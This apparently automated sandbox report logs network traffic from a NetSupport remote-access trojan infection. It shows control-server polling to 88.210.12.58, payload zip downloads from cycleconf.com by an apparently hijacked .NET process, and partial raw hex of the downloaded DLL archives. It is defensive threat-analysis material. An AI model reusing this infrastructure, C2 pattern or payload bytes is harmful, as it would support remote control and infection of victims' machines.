                                                                                                          Dec 10, 2024 08:58:34.965302944 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.099853992 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.099924088 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.104358912 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.104435921 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.107986927 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.108059883 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.111172915 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.111247063 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.114559889 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.114635944 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.119055986 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.119134903 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.122621059 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.122698069 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.126014948 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.126079082 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.130599022 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.130687952 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.133440971 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.133498907 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.135607004 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.135653019 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.135662079 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.135674953 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.135705948 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.135735989 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.153899908 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.153919935 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.153928995 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.153975010 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.851860046 CET498653785192.168.2.588.210.12.58
                                                                                                          Dec 10, 2024 08:58:35.971528053 CET37854986588.210.12.58192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.971729994 CET498653785192.168.2.588.210.12.58
                                                                                                          Dec 10, 2024 08:58:36.085618019 CET4986980192.168.2.5104.26.0.231
                                                                                                          Dec 10, 2024 08:58:36.088915110 CET498653785192.168.2.588.210.12.58
                                                                                                          Dec 10, 2024 08:58:36.204974890 CET8049869104.26.0.231192.168.2.5
                                                                                                          Dec 10, 2024 08:58:36.205049038 CET4986980192.168.2.5104.26.0.231
                                                                                                          Dec 10, 2024 08:58:36.205456018 CET4986980192.168.2.5104.26.0.231
                                                                                                          Dec 10, 2024 08:58:36.208369017 CET37854986588.210.12.58192.168.2.5
                                                                                                          Dec 10, 2024 08:58:36.324753046 CET8049869104.26.0.231192.168.2.5
                                                                                                          Dec 10, 2024 08:58:37.210413933 CET37854986588.210.12.58192.168.2.5
                                                                                                          Dec 10, 2024 08:58:37.212775946 CET498653785192.168.2.588.210.12.58
                                                                                                          Dec 10, 2024 08:58:37.332108021 CET37854986588.210.12.58192.168.2.5
                                                                                                          Dec 10, 2024 08:58:37.603517056 CET37854986588.210.12.58192.168.2.5
                                                                                                          Dec 10, 2024 08:58:37.633193970 CET8049869104.26.0.231192.168.2.5
                                                                                                          Dec 10, 2024 08:58:37.633282900 CET4986980192.168.2.5104.26.0.231
                                                                                                          Dec 10, 2024 08:58:37.654623985 CET498653785192.168.2.588.210.12.58
                                                                                                          Dec 10, 2024 08:58:37.804897070 CET498653785192.168.2.588.210.12.58
                                                                                                          Dec 10, 2024 08:58:37.924567938 CET37854986588.210.12.58192.168.2.5

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 10, 2024 08:58:22.034070015 CET6154153192.168.2.51.1.1.1
                                                                                                          Dec 10, 2024 08:58:22.262923956 CET53615411.1.1.1192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.666821003 CET5742853192.168.2.51.1.1.1
                                                                                                          Dec 10, 2024 08:58:35.804672956 CET53574281.1.1.1192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.891145945 CET5829653192.168.2.51.1.1.1
                                                                                                          Dec 10, 2024 08:58:36.028695107 CET53582961.1.1.1192.168.2.5

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 10, 2024 08:58:22.034070015 CET192.168.2.51.1.1.10x9e4dStandard query (0)cycleconf.comA (IP address)IN (0x0001)false
                                                                                                          Dec 10, 2024 08:58:35.666821003 CET192.168.2.51.1.1.10x718bStandard query (0)ganeres1.comA (IP address)IN (0x0001)false
                                                                                                          Dec 10, 2024 08:58:35.891145945 CET192.168.2.51.1.1.10x35b2Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 10, 2024 08:58:22.262923956 CET1.1.1.1192.168.2.50x9e4dNo error (0)cycleconf.com23.254.224.41A (IP address)IN (0x0001)false
                                                                                                          Dec 10, 2024 08:58:35.804672956 CET1.1.1.1192.168.2.50x718bNo error (0)ganeres1.com88.210.12.58A (IP address)IN (0x0001)false
                                                                                                          Dec 10, 2024 08:58:36.028695107 CET1.1.1.1192.168.2.50x35b2No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                          Dec 10, 2024 08:58:36.028695107 CET1.1.1.1192.168.2.50x35b2No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                          Dec 10, 2024 08:58:36.028695107 CET1.1.1.1192.168.2.50x35b2No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • cycleconf.com
                                                                                                          • 88.210.12.58connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                          • geo.netsupportsoftware.com
                                                                                                          • 88.210.12.58connection: keep-alivecmd=encdes=1data=u2hr4]%y-=id3wi7?=@ff&t[6ralqzd-ed#rtr5=ifp">0mqyz8a1v{r?(+he<kua]&k=jwe*9w_z8a ]
                                                                                                          • 88.210.12.58connection: keep-alivecmd=encdes=1data=l3<(t{evk9|||$(m$czen>j"bml`

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.54986588.210.12.583785828C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 10, 2024 08:58:36.088915110 CET216OUTPOST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 88.210.12.58Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                          Data Raw:
                                                                                                          Data Ascii:
                                                                                                          Dec 10, 2024 08:58:37.210413933 CET224INHTTP/1.1 200 OKServer: NetSupport Gateway/1.92 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 69Connection: Keep-AliveCMD=ENCDES=1DATA=g+${ \W[R7)^\d8=M`sM6
                                                                                                          Data Raw:
                                                                                                          Data Ascii:
                                                                                                          Dec 10, 2024 08:58:37.212775946 CET426OUTPOST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 232Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr4]%y-=ID3Wi7?=@Ff&t[6raLqZD-eD#rtr5=Ifp">0MQYz8A1V{r?(+hE<KuA]&k=JwE*9W_z8A ]
                                                                                                          Data Raw:
                                                                                                          Data Ascii:
                                                                                                          Dec 10, 2024 08:58:37.603517056 CET309INHTTP/1.1 200 OKServer: NetSupport Gateway/1.92 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 154Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr \WhE=I=n~2I[=I_T&=n&Z=n#Lqf3m#VWi6%<o`/$aOUw7?=@|-%
                                                                                                          Data Raw:
                                                                                                          Data Ascii:
                                                                                                          Dec 10, 2024 08:58:37.804897070 CET270OUTPOST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 76Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=l3<(T{EVk9|||$(m$CZeN>j"Bml`
                                                                                                          Data Raw:
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.549869104.26.0.23180828C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 10, 2024 08:58:36.205456018 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                          Host: geo.netsupportsoftware.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Dec 10, 2024 08:58:37.633193970 CET986INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 10 Dec 2024 07:58:37 GMT
                                                                                                          Content-Type: text/html; Charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Ray: 8efbb0da1e3d32fc-EWR
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: private
                                                                                                          Set-Cookie: ASPSESSIONIDSAQDRQAT=BMPGNGJDFOEKOPBFHPOKNOFL; path=/
                                                                                                          cf-apo-via: origin,host
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3ioDah2ZJKU1puf%2BeFi9n30GzkZ02qSJ0T9z6GpzOgGX4hkFODmWXl8vo8kBGSCPOBorjkHDKnolMDokV73AvBA8bfj90nlvbsQHC8CZ0fHlbboFtbm21LESnD%2Ff7wZtbC9cWd83x3acAvt"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 1040.7357,-74.17240


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.54983123.254.224.414432972C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-10 07:58:24 UTC55OUTGET /dwnld/2nd2_1.zip HTTP/1.1
                                                                                                          Host: cycleconf.com
                                                                                                          2024-12-10 07:58:24 UTC262INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 10 Dec 2024 07:58:24 GMT
                                                                                                          Server: Apache
                                                                                                          Upgrade: h2,h2c
                                                                                                          Connection: Upgrade, close
                                                                                                          Last-Modified: Wed, 24 Jul 2024 21:12:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 41029
                                                                                                          Vary: Accept-Encoding
                                                                                                          Content-Type: application/zip
                                                                                                          2024-12-10 07:58:24 UTC7930INData Raw: 50 4b 03 04 14 00 00 00 08 00 7c 8b 14 53 cd 14 86 d9 ca 1f 00 00 00 4a 00 00 0e 00 00 00 6d 73 61 75 73 65 72 65 78 74 2e 64 6c 6c ed 7c 0d 78 53 d7 95 e0 95 2c 81 00 1b 0b 62 83 43 1c 50 8a 49 dc 00 ce 93 25 db 92 7f b0 8c 2d 07 1a db c8 ff 90 60 6c 61 3d 23 39 b2 ac 48 ef 11 9c 85 8e 13 e3 2d ca 8b 3b 6c 9a 6e 33 1d 3a 1b 20 db a6 6d b6 93 4c 99 86 7a d2 46 60 82 0d 21 59 a7 cd 26 24 a1 1d 37 e3 4c 45 ed 4d 9d 29 05 87 38 68 cf b9 ef ea c7 7f 34 9d f9 f6 fb f6 db e6 f1 dd 7b df 3d e7 dc 73 cf cf fd 39 57 be 8f ca fb 0f 93 04 42 88 0a 52 38 4c c8 49 22 3f 16 f2 a7 9f 09 48 4b d7 f4 2f 25 27 16 bd 7e c7 49 45 c5 eb 77 d4 39 5d 7e 9d d7 d7 b9 c7 67 ef d0 b5 da 3d 9e 4e 41 b7 9b d7 f9 44 8f ce e5 d1 95 6d ab d5 75 74 3a f8 ac a4 a4 c5 19 8c c7 ab bf 7c 81
                                                                                                          Data Ascii: PK|SJmsauserext.dll|xS,bCPI%-`la=#9H-;ln3: mLzF`!Y&$7LEM)8h4{=s9WBR8LI"?HK/%'~IEw9]~g=NADmut:|
                                                                                                          2024-12-10 07:58:24 UTC8000INData Raw: f5 e5 fa 2a fd df e8 5f 02 5b 7f a8 9f d2 2f cb ce 31 54 82 85 ce 1a 7e 63 30 1a 77 1a 7d c6 1e d0 fe 98 f1 07 c6 a0 71 c8 38 6e fc a3 b1 30 67 73 ce 96 9c e7 72 fe 47 ce 2b 39 bf ca f9 38 e7 5a ce 77 73 cf e4 fe 32 f7 52 ee 87 b9 d7 73 93 f3 56 e7 dd 99 77 4f 5e 4e 5e 4d de b1 bc ef e5 5d c8 fb 5f 79 23 79 bf cd fb 24 2f 9c a7 36 2d 31 2d 33 ad 34 ad 36 ad 33 6d 30 19 4c f9 a6 12 d3 16 93 cd b4 dd d4 62 72 9b 44 d3 23 a6 6e d3 e3 a6 a7 4c cf 9a 4e 98 fa 4d af 82 4d df 31 fd d6 34 61 fa cc 94 60 5e 64 4e 36 a7 98 ef 30 67 9b 4d 66 bb 79 8f b9 c3 fc 90 f9 b0 f9 69 f3 11 f3 b3 e6 e7 cc 2f 98 4f 98 5f 36 07 c1 fe 17 cc 6f 99 2f 82 0f 46 cd e3 e6 09 f0 c2 86 7c 2e 1f bf 13 c4 58 47 1e e1 85 1c b1 c9 df 16 8e 72 f2 df b4 12 09 fb 3f 72 fe 3f 7f fe 0f 50 4b 03
                                                                                                          Data Ascii: *_[/1T~c0w}q8n0gsrG+98Zws2RsVwO^N^M]_y#y$/6-1-3463m0LbrD#nLNMM14a`^dN60gMfyi/O_6o/F|.XGr?r?PK
                                                                                                          2024-12-10 07:58:24 UTC8000INData Raw: 84 2f 75 c5 40 7a 17 c6 81 8e 40 a2 1a d1 31 ce 8e 33 a6 1f 0e 5c e7 76 fe a1 9a 00 a0 6a 26 ca d8 28 73 45 19 17 65 9e 28 f3 42 19 1f 65 3e 28 1b 84 b2 21 28 23 51 16 80 32 09 64 46 b7 cd 9e 28 df 8a f3 9d 9e c8 bf b8 ed 85 5b f5 1a 94 55 42 e6 e8 0f 90 63 12 d5 d8 e4 99 21 75 55 a2 de b0 7c 97 36 77 9a d3 08 c6 79 4c 5b 89 51 50 0d 46 d7 72 02 6b a0 16 29 1c af 11 d4 38 ce ca 4b 87 02 e6 07 e5 1f 01 63 75 14 30 d9 e8 16 99 8a 94 78 72 ed bf d2 a7 97 94 47 d3 0d 9f ea 00 59 ae 50 dc ed 81 a4 43 2f 6d 17 a9 39 c0 41 45 d6 3d c3 62 41 f1 08 08 e6 0f 5e 9b 60 1c c7 23 3b 9c 1f a1 8d 1b 5b 74 31 d1 b8 ed 34 ac 7d 15 1f 9e 83 5c da e7 3c 38 4d 43 77 ad 06 40 b5 dc b1 04 57 cb 84 cc f2 d5 53 ac 81 36 0a 09 18 51 ad b2 1c 82 51 44 35 c6 f2 f3 d0 d1 58 7e 09 e7
                                                                                                          Data Ascii: /u@z@13\vj&(sEe(Be>(!(#Q2dF([UBc!uU|6wyL[QPFrk)8Kcu0xrGYPC/m9AE=bA^`#;[t14}\<8MCw@WS6QQD5X~
                                                                                                          2024-12-10 07:58:24 UTC8000INData Raw: 01 4c b1 b3 d8 5d ec 21 f6 12 bf 21 f6 13 93 e2 40 b1 5c 3c 5c 1c 25 1e 2d 8e 17 a7 89 37 88 bf 16 6f 13 9f 12 5f 13 df 11 3f 10 77 0e f4 08 f4 0e f4 0b 14 07 a6 04 1a 02 67 63 19 55 07 d2 83 7a 06 09 82 e2 82 be 08 3a 1b f4 5b 90 25 e8 71 50 6b 10 53 d2 5b 32 44 12 24 19 29 d1 48 a6 49 a6 4b 16 48 96 4b d6 80 9c 76 4b 0e 4a 2e 48 ee 48 1e 49 5c a4 7c a9 bf 54 24 95 4a 23 a5 89 d2 54 e9 34 e9 4c e9 5c e9 17 d2 a3 d2 ce c1 7e c1 c2 e0 e8 e0 b1 c1 59 c1 73 83 3f 0b fe 36 78 57 f0 b5 e0 b7 64 63 65 69 b2 1c d9 52 59 a5 6c 97 ec a1 ec a9 6c 90 5c 28 8f 92 8f 93 e7 cb ad 72 17 05 5f e1 ab 08 50 bc ab f8 40 b1 57 71 48 71 4b 31 39 64 6a c8 bc 90 f2 90 c5 21 d5 21 3d 42 47 86 c6 86 8e 0f cd 0e 9d 1f 8a 17 6b 82 84 18 ad 0b d9 8b f4 26 87 80 0c d4 e4 24 72 39 f9
                                                                                                          Data Ascii: L]!!@\<\%-7o_?wgcUz:[%qPkS[2D$)HIKHKvKJ.HHI\|T$J#T4L\~Ys?6xWdceiRYll\(r_P@WqHqK19dj!!=BGk&$r9
                                                                                                          2024-12-10 07:58:24 UTC8000INData Raw: 3c 6f 70 50 eb a5 3f 43 52 86 ae 03 13 8c e1 37 d5 44 e3 0f d4 c4 d2 67 c6 ea a9 06 eb 9c 66 2c 8d 9a b1 ac 69 56 8c 11 aa c1 73 ea 86 3c c3 ad 41 78 82 57 65 23 23 34 7c 61 14 fe 63 2d cd 6a fc 7b 35 ea ea 2f 6b d4 9b 6f 03 58 cc fc 4a fd 58 5d 51 39 c4 eb 94 65 72 a6 6e d6 29 2d 4e f0 3a 45 bf 0e e2 37 2c 23 23 9e c3 ff d8 0b 7f 46 df 18 a5 f1 ff fc 1a b9 cd b7 93 02 a8 f5 76 3a 08 b8 80 02 68 18 3c e0 02 0a a0 0b e0 01 17 50 00 5d 04 0f b8 80 02 e8 12 78 c0 05 14 40 0a 3c e0 02 0a 20 3a a8 ff b9 80 02 a8 06 1c e0 02 0a a0 66 f0 80 0b 28 80 5a c1 03 2e a0 00 1a 06 0f b8 80 02 e8 02 78 c0 05 14 40 17 c1 03 2e a0 00 ba 04 1e 70 01 05 90 02 0f b8 80 02 78 51 7c 10 70 01 c5 0b e4 1a f0 80 0b 28 80 9a c1 03 2e a0 00 6a 05 0f b8 80 02 68 18 3c e0 02 0a a0 0b
                                                                                                          Data Ascii: <opP?CR7Dgf,iVs<AxWe##4|ac-j{5/koXJX]Q9ern)-N:E7,##Fv:h<P]x@< :f(Z.x@.pxQ|p(.jh<
                                                                                                          2024-12-10 07:58:24 UTC1099INData Raw: ab e5 af 53 b3 cb a0 da 7d 8e 7f 12 1f 08 9d c6 71 6a e6 11 72 03 c9 0b c3 56 37 e0 9e db df d7 7f c1 fa ed 88 fb 47 55 57 cf 2f 07 3c 91 d5 76 f3 eb 83 42 8b 1a ea 1f 6b a8 07 ce ea 7f b0 45 11 7b ba 45 7d 97 5a 70 41 ae 0a 54 a7 a0 36 f9 fe d5 79 07 0e 2c 4a 18 2a 2d b3 be f3 89 52 77 bf ba d6 2b f0 d9 a6 45 a4 b0 35 33 1c c2 7a f4 51 11 27 52 1a 42 88 a1 0d d7 75 a4 06 d7 7e 5c 3b 54 7b c2 3e a3 6b 37 24 40 85 c3 0a b6 04 09 00 20 fb bf a2 00 63 b3 ad 31 a7 9d 05 fc cb a0 e6 68 ce 81 82 e4 24 0f 55 41 1d 09 24 2b 3a 80 1d c5 aa e0 d4 d1 86 68 48 19 ad 54 62 d7 82 d5 0d de d3 03 76 07 54 af 3c dd 4d 03 23 25 aa cb 41 41 20 a9 00 4c 26 fc e0 eb 9b 7f f1 f5 bf 42 dd 64 1d 09 a2 8c 24 43 14 38 6b 12 26 42 f8 71 ca 86 e6 27 fb 11 5e 62 0f be 31 98 b6 ac fa
                                                                                                          Data Ascii: S}qjrV7GUW/<vBkE{E}ZpAT6y,J*-Rw+E53zQ'RBu~\;T{>k7$@ c1h$UA$+:hHTbvT<M#%AA L&Bd$C8k&Bq'^b1


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.54983723.254.224.414432972C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-10 07:58:26 UTC55OUTGET /dwnld/2nd2_2.zip HTTP/1.1
                                                                                                          Host: cycleconf.com
                                                                                                          2024-12-10 07:58:26 UTC264INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 10 Dec 2024 07:58:26 GMT
                                                                                                          Server: Apache
                                                                                                          Upgrade: h2,h2c
                                                                                                          Connection: Upgrade, close
                                                                                                          Last-Modified: Wed, 24 Jul 2024 21:12:30 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1397545
                                                                                                          Vary: Accept-Encoding
                                                                                                          Content-Type: application/zip
                                                                                                          2024-12-10 07:58:26 UTC7928INData Raw: 50 4b 03 04 14 00 00 00 08 00 41 61 87 4f b9 dd 8c 32 53 1b 00 00 00 3a 00 00 0c 00 00 00 6d 73 63 70 78 6c 33 32 2e 64 4c 4c ed 3b 0b 58 5c d5 99 67 5e 64 88 43 66 62 c0 a0 92 04 75 62 a9 10 76 1e bc 87 61 20 30 84 28 24 43 20 90 17 20 81 81 01 79 4c 66 ee e4 e1 86 04 be 61 12 26 37 93 d2 55 d7 b4 8d ad 36 da c6 36 ad ba 5f aa 44 ad 0e 21 02 d1 24 c6 c7 46 6b 6c 9b 6a ea 37 2c ac a2 9b 8d 24 a6 b9 fb ff e7 de 19 06 88 d6 76 b7 5f 77 bf f5 f0 9d 7b ce f9 cf 7f fe d7 f9 cf 39 ff b9 73 29 59 d7 4b 24 84 10 29 64 8e 23 a4 8f f0 29 97 fc f9 74 1e f2 9c 45 cf cf 21 47 22 4f dd d6 27 2a 3e 75 5b b9 ad c9 19 6f 77 b4 37 3a 6a 5b e3 eb 6a db da da 99 f8 8d d6 78 87 ab 2d be a9 2d be 60 65 59 7c 6b 7b bd 35 39 2a 6a b6 5a a0 91 7a 7a e3 5b 9b 9e 52 74 06 b3 f5 b8
                                                                                                          Data Ascii: PKAaO2S:mscpxl32.dLL;X\g^dCfbubva 0($C yLfa&7U66_D!$Fklj7,$v_w{9s)YK$)d#)tE!G"O'*>u[ow7:j[jx--`eY|k{59*jZzz[Rt
                                                                                                          2024-12-10 07:58:26 UTC8000INData Raw: fa 7a 84 e1 99 f2 cb 4b f5 42 68 b7 89 d9 45 56 2e 3a 5d 4a 56 5b 77 76 66 75 d5 2e a3 b0 2f f6 97 94 bf 7f 72 fe 87 b4 fc 16 e6 30 b1 4a d1 c9 4a 45 97 db a9 64 b5 73 38 26 a1 57 fe 81 c9 f9 73 b5 fc 56 e6 b0 b0 4a 93 13 6a e2 82 aa b8 b1 2e 27 39 0c 4b 42 5d fa d4 c7 92 0c af 6d c9 65 ea 73 fa 32 f5 19 9a 9c 7f cd 92 5e fd 71 26 65 7f 40 bc 54 22 aa c1 2a b0 40 a6 5f f0 c8 d7 fe 2c 4b f0 0b 6c bf 9c fe 9b 2c 21 5a 2a e2 00 54 37 5f be fe a1 e4 f2 2d 6a f9 0e 91 a5 33 8b 5f 70 f9 07 b0 fd ca a1 a4 1a 50 f9 bc 71 25 a2 db 57 04 10 a0 81 32 54 b4 6a 97 08 a9 42 ad 0a fd 6a 7f f0 9e 54 01 c8 6f de 6a b7 98 b7 54 9a d8 14 ea 71 b7 4f 8f 40 a0 b9 9d 04 c5 24 a4 4a bf b5 d2 d4 74 da 32 60 17 95 6c b7 42 e9 26 1f ce 55 b7 53 cb 67 11 e2 e9 ad 90 de c2 a6 f0 2c
                                                                                                          Data Ascii: zKBhEV.:]JV[wvfu./r0JJEds8&WsVJj.'9KB]mes2^q&e@T"*@_,Kl,!Z*T7_-j3_pPq%W2TjBjTojTqO@$Jt2`lB&USg,
                                                                                                          2024-12-10 07:58:26 UTC8000INData Raw: 48 db 46 56 77 1e 60 9e bb 00 38 85 1a 20 54 a7 85 9e 83 d0 8e a9 a1 5a ab 10 bc 8d 55 9a 22 8e 56 97 5f e7 1e 88 e6 13 5e 24 96 59 dd 90 60 99 a3 8d 98 82 5a 39 7c 3e 98 81 6f 00 35 54 bb 4f 08 c0 fc 36 41 8b 80 d0 23 9b de 73 81 cc a3 8a 25 3c 90 d1 6d 5e 35 08 ba b0 7a 56 0d 76 96 45 58 13 75 09 99 7b 5c da de aa fa a7 8b ff d3 c5 df ae f8 17 4b d2 7b d3 95 87 24 27 de b7 2f e9 3c 5b 27 9e 67 fb 77 ad 29 76 9e ad 7e 55 ca f3 6c aa fd e0 2f 1f b3 c4 52 3e b0 2a 65 ca 84 f1 9f 94 20 9f 79 51 20 47 dd 2d aa 69 a6 8c f6 eb 9d 3e 63 7f 20 c0 dd fd a0 02 1f 2f 4d 03 0e 11 fb 98 f4 06 10 eb f6 75 f6 d3 62 db 30 76 35 6e ee 31 4f ae 5f ef 62 f7 8d f6 9d 8e c5 fe 7e 69 9a 66 6b 1b 83 7c 24 16 bb 96 20 8f 4a 82 dc 1a 8b 5d 40 90 47 26 41 de 1e 8b 9d 49 b1 a8 6d
                                                                                                          Data Ascii: HFVw`8 TZU"V_^$Y`Z9|>o5TO6A#s%<m^5zVvEXu{\K{$'/<['gw)v~Ul/R>*e yQ G-i>c /Mub0v5n1O_b~ifk|$ J]@G&AIm
                                                                                                          2024-12-10 07:58:26 UTC8000INData Raw: 61 c3 58 3a 73 98 5c f9 ed c0 f3 ec 97 87 7e 89 e7 f1 49 09 e1 00 29 40 0b 56 2e 6a c1 c8 3e 27 50 2f a9 48 a3 5e 57 01 54 da 67 35 7c 0c 24 5b 09 cc 42 82 13 a3 57 9f a6 a2 57 62 02 bd 12 91 5e 55 38 e5 cf 5d 57 a0 56 62 32 b5 12 fb da 2b cc 7e ee ca f6 0a fe 6c b9 f9 0e e8 ee 2e 9c 09 c1 98 bd c2 f9 80 19 6a be e7 76 10 ca d2 f7 a5 93 a6 fa 7c 7c 0f d1 75 a7 85 ba a3 1d cf 13 96 8a 52 b9 49 c9 72 e2 d8 d5 e2 a9 2a 68 eb 10 0d 51 95 ac 19 10 2e 95 5a a5 0c 7f ae 7c ff 1d aa 5d 84 a8 ce 67 7e cb b8 87 b5 ca 83 ee e4 b7 8c a3 a9 8d cf b2 1a 04 85 56 ad b4 3f dc 1e bb 49 1c b9 ea 87 6f 4f 7d 99 b2 66 8f f3 09 db e5 4d 56 0d b5 a4 0b 91 45 ba 95 22 6e 14 5c c8 8f 92 59 ea fb 5f f1 d5 27 6e 37 84 39 d3 51 35 5b df 08 53 b4 02 48 bb ef 08 12 a0 7d 38 45 df e8
                                                                                                          Data Ascii: aX:s\~I)@V.j>'P/H^WTg5|$[BWWb^U8]WVb2+~l.jv||uRIr*hQ.Z|]g~V?IoO}fMVE"n\Y_'n79Q5[SH}8E
